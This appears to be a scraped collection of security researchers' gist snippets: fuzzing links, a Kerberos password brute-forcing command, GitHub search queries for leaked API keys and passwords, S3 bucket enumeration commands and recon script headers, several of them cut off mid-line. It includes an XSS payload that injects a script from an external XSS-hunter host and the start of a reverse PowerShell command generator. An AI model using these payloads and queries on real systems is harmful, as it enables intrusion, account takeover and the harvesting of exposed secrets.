mylamour

Artical

• https://medium.com/@coolx28/security-oriented-open-source-continuous-fuzzing-101-from-start-to-finish-637eaceb9acb
• https://foxglovesecurity.com/2016/03/15/fuzzing-workflows-a-fuzz-job-from-start-to-finish/
• https://research.aurainfosec.io/hunting-for-bugs-101/
• https://labsblog.f-secure.com/2017/06/22/super-awesome-fuzzing-part-one/
• https://thecyberrecce.net/2017/03/20/software-exploit-development-fuzzing-with-afl/
• https://www.sec-consult.com/wp-content/uploads/files/vulnlab/the_art_of_fuzzing_slides.pdf
• https://hackernoon.com/afl-unicorn-fuzzing-arbitrary-binary-code-563ca28936bf

Rhynorater

d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://rhy.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)

jthuraisamy

Windows Toolkit

Binary

Native Binaries

• IDA Pro

IDA Plugins	Preferred	Neutral	Unreviewed

tothi

#!/usr/bin/env python3
#
# generate reverse powershell cmdline with base64 encoded args
#

import sys
import base64

def help():
    print("USAGE: %s IP PORT" % sys.argv[0])

cihanmehmet

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!#$%&'()*+,-./:;<=>?@[\]^_`{|}~" 

TarlogicSecurity

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

nullenc0de

https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code
https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code
https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code
https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code
https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI

cihanmehmet

GREP NOT IP RESULT
cat file.txt| grep -Eov "\b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b"

grep -Eov "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" some_ip.txt

egrep -v '[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}' file.txt

grep -v "[[:alpha:]]" some_url-ip.txt |egrep -v '[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}'

grep -Eov "^([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})$" d.txt

the-xentropy

Ffuf (faster):
ffuf -u "https://s3.REGION.amazonaws.com/COMPANYDELIMITERENVIRONMENT" -w "aws-regions.txt:REGION" -w "company.txt:COMPANY" -w "delimiters.txt:DELIMITER" -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:ENVIRONMENT" -mc 200 -v


Wfuzz:
wfuzz -u "https://s3.FUZZ.amazonaws.com/FUZ2ZFUZ3ZFUZ4Z" -w aws-regions.txt -w company.txt -w delimiters.txt -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt" --sc 200 -v -t 50

The files:

dwisiswant0

#!/bin/bash

#####
#
# St8out - Extra one-liner for reconnaissance
#
# Usage: ./st8out.sh target.com
#
# Resources:
# - https://github.com/j3ssie/metabigor